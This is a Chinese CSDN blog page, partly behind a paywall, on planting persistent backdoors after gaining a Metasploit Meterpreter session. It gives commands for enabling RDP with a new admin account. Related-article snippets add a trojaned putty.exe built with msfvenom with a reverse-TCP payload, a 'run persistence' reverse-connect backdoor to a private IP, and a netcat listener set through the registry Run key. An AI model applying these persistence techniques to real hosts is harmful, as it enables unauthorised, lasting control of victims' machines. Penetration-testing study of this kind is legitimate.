获取meterpreter权限后如何留后门

最新推荐文章于 2024-01-26 15:41:32 发布
最新推荐文章于 2024-01-26 15:41:32 发布
阅读量2.2k 收藏 22
点赞数 2
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTtiandd/article/details/108718449
版权
本文详细介绍了在获取Meterpreter权限后如何在目标主机上创建持久后门,包括通过创建用户、修改注册表、利用SAM值等方式实现远程登录和持久化攻击。同时,文章还讲解了如何设置Meterpreter的持久化模块,确保即使断开会话也能重新连接到目标设备。
摘要由CSDN通过智能技术生成

我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令

创建文本,并向里出入内容,并打开:

echo "hello I am hacker" >>1.txt

之后再打开:notepad 1.txt即可

拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号

方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrators权限

meterpreter > run post/windows/manage/enable_rdp

meterpreter > run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456

 

 

方法二:通过shell进入靶机,在靶机里创建账号

meterpreter >

最低0.47元/天 解锁文章
Leng_tian
关注
专栏目录
meterpreter 持久后门
01-02 712
创建持久后门 当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门。创建持久后门的具体操作步骤如下所示。 (1)激活Meterpreter会话。执行命令如下...
PHP Meterpreter后门
Admin_Shell的博客
02-24 1608
Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP Web shell。利用目标的漏洞(常见的注入和上传漏洞)之后,再把它的shell传到目标主机即可。 实验环境 系统:Kali2019 iP地址:192.168.1.15 使用工具: PHP Meterpreter **目标主机 系统:Windows2008 iP地...
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2428
metasploit后渗透测试--持久化后门
6.1 meterpreter创建后门
robacco的博客
07-31 650
1、使用msfvenom捆绑putty.exe程序,生成后门程序bd_putty.exe。该程序与宿主程序具体相同的功能,当运行后门程序的同时,将运行攻击载荷。 msfvenom -a x64 --platform windows -x /opt/putty.exe -k -p windows/x64/meterpreter_reverse_tcp lhost=192.168.57.128 l...
通过meterpreternc后门
Yale的博客
01-27 1979
在靶机上安装一个netcat后门(包括修改系统注册表及防火墙) 首先我们需要上传我们的nc到靶机上 Uploaded表示上传成功(注:由于靶机是64位,所以自动上传到了syswow64路径下)   接下来我们需要修改注册表的键“HKLM\software\microsoft\windows\currentversion\run” 让nc在启动后执行并且在445端口监听  
Metasploit后门攻击android
2301_77778745的博客
04-26 432
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
Metasploit 渗透测试之制作隐藏后门
weixin_46035615的博客
05-01 2885
1. 实战-使用 ms17-010 永恒之蓝漏洞对 win7 进行渗透 2. 实战-Linux 无文件木马程序 3. 实战-使用脚本来进行自动创建后门 4. 系统日志清理
MSFVenom生成Meterpreter后门详解
Meterpreter后门则是一种非常强大的后门工具,能够提供灵活的远程访问和控制目标系统的功能。 ## 1.2 后门生成的基本原理 后门生成的基本原理是通过利用系统漏洞或安全漏洞,向目标系统注入恶意代码,以实现对...
渗透测试-[Meterpreter后渗透25招]
m0_43405474的博客
05-07 3303
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
后门的类型与kali生成后门如何实现,及如何使用
2301_77441874的博客
06-19 1704
小小的讲一下后门程序以及kali如何进行后门的生成以及调用。
后渗透工具 – Meterpreter(WEB安全攻防)
小英雄颂人头
03-01 1219
0xx1 后渗透工具 – Meterpreter 优势 纯内存工作模式,不需要对磁盘进行任何写入操作 使用加密通信协议,并且可以同时与几个信道通信 在被攻击进程内工作,不需要创建新的进程 易于在多进程之间迁移 平台通用 0xx2 进程迁移 ps – 获取目标机器进程 getpid – 查看Meterpreter shell的进程号 migrate – 进程迁移 run post...
Exp2-后门原理与实践 20202127
qq_57435798的博客
03-23 472
通过本次实验,我熟悉了netcat、socat和MSF等工具和平台的使用,对linux命令的掌握也更上一层楼。同时我深入了解了后门原理,并通过自己生成后门程序、反弹式连接等操作获得了其他主机的访问权与控制权。后门是一扇隐蔽的门,能够方便入侵者再次进入原先入侵过的系统。不正当的后门存在严重威胁着网络安全,应该通过技术手段加强防护。
Meterpreter 建立持久后门 backdoor
盗才生的博客
05-06 9880
安装后门方法一: meterpreter >run persistence -X -i 5 -p 443 -r 192.168.0.108 Persistent agent script is 609628 bytes long RunningPersistance Script Resource filefor cleanup created at /root/.msf4/logs/
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1784
利用meterpreter对win7系统进行提权
【内网安全】——meterpreter使用攻略
最新发布
qq_53058639的博客
01-26 1172
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
Metasploit应用笔记-msfvenom生成meterpreter后门代码
oneVs1的专栏
02-28 1万+
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c
牛逼的导航
热门推荐
HkEndless的专栏
12-27 8万+
It will be read and overwritten.      DO NOT EDIT! --> Bookmarks Bookmarks Menu     Recently Bookmarked     Recent Tags         Get Bookmark Add-ons         Mozilla Firefox
Meterpreter使用总结(2)之后渗透攻击模块
CODING...
02-08 1万+
meterpreter虽然功能强大,作为单一的工具还是会有他功能的局限性,因此在metasploit4.0之后引入了后渗透攻击模块,通过在meterpreter中使用ruby编写的模块来进行进一步的渗透攻击。 (1)获取目标机器的分区情况: (2)判断是否为虚拟机: 如果有时候我们渗透测试的时候发现获得的目标机器是一个虚拟机,就要打醒十二分精神了,有可能这个是对方设置的一个蜜罐系统。
使用MSF进行渗透测试:Web传递获取靶机权限教程
"E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限" 在网络安全领域,渗透测试是一种授权的攻击方法,用于检测系统和网络的安全漏洞。该课程主要讲解如何利用Metasploit Framework (MSF)进行渗透测试,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leng_tian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值